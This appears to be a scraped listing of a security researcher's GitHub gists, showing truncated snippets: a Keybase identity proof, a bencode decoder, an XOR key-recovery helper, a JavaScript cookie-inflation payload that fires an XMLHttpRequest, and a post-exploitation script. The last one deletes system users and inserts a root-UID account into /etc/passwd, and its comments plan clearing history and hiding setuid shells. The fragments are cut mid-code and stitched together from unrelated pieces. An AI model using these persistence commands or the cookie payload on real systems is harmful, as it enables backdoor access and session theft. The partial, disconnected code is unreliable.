I hereby claim:
- I am sbehrens on github.
- I am arbit (https://keybase.io/arbit) on keybase.
- I have a public key whose fingerprint is 3BCB 4364 EF4A 3F6A C890 A755 18B8 EFD6 D8EE 14EA
To claim this, I am signing this object:
def decode_string(x, f): | |
colon = x.index(':', f) | |
try: | |
n = int(x[f:colon]) | |
except (OverflowError, ValueError): | |
n = long(x[f:colon]) | |
if x[f] == '0' and colon != f+1: | |
raise ValueError | |
colon += 1 |
import array | |
import base64 | |
import copy | |
# Found X0R cipher on an app assessment? Got the ciphertext and know the plaintext? Use this to get the key. | |
cipher_text = array.array('B', base64.b64decode("Some Blob of base64 encoded ciphertext remove decoder if not base64")) | |
plain_text = array.array('B', "some known plaintext value") |
(function(d){ | |
desired_length = 8192; | |
for(cookie_val = '=';cookie_val.length<=97;cookie_val+="A"){}; | |
for(i=100;(desired_length-d.cookie.length)>111;i++,d.cookie=i+cookie_val){}; | |
for(cookie_val="999=";(cookie_val.length + d.cookie.length + 9) <= desired_length;cookie_val += "A"){}; | |
d.cookie = cookie_val; | |
d.cookie = "888=8"; | |
x = new XMLHttpRequest(); | |
x.onreadystatechange = function(){ | |
if (x.readyState == 4 && x.status == 400){ |
I hereby claim:
To claim this, I am signing this object:
# TODO | |
# copy binarys to new location, execute from said location. ensure ps command filters out commands | |
#PORT="1337" | |
# Add users, cat ssh key for ssh key access, clear history, copy shells with sguid bit set to hidden files for later use | |
deluser news > /dev/null 2>&1 | |
deluser list > /dev/null 2>&1 | |
sed '7ilist:x:0:0:list,,,,:/:/bin/bash' /etc/passwd > /tmp/out.txt && cat /tmp/out.txt > /etc/passwd && rm /tmp/out.txt |